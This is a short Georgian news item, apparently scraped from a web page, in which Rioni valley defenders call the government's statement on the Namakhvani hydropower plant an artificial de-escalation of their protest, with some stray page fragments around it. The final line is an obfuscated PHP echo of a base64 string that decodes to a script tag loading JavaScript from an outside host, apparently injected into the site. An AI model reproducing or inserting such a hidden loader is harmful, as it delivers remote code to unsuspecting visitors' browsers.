celsiusi
ავერსი საქკაბელი
ნამახვნჰესთან დაკავშირებით მთავრობის გადაწყვეტილებას რიონის ხეობის მცველები აპროტესტებენ და ამბობენ, რომ განცხადება, რომელიც დღეს ჰესის პროექტთან დაკავშირებით მთავრობამ გამოაქვეყნა, პროტესტის ხელოვნური დეესკალაციაა და მათ მოთხოვნებს არ აკმაყოფილებს. 
 
"ის განცხადება, რომელიც დღეს ნამახვანჰესთან დაკავშირებით მთავრობამ გამოაქვეყნა, არის ჩვენი მოთხოვნების პირდაპირი დაუკმაყოფილებლობა.
 
ეს მიუთითებს იმას, რომ ხელისუფლება იმ პოზიციაზე დგას, რომ ჰესი აშენდება. ისინი ცდილობენ მოხდეს პროტესტის დეესკლაცია ხელოვნურად. მათ ანგარიში უნდა გაუწიონ ხალხს და ისაუბრონ პროტესტის აქტორებთან.
ხელისუფლების მხრიდან არის მცდელობები, რომ გააპრავონ ხარვეზები, რომელიც ნამახვანის ხელშეკრულების სახით ვიხილეთ.
 
ამ განცხადებით აღიარებენ, რომ ხელშეკრულება ეროვნული ინტერესების დარღვევით გაფორმდა,"- განაცხადა რიონის ხეობის ერთ-ერთმა მცველმა მირზა ნოზაძემ. 
 
1347
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");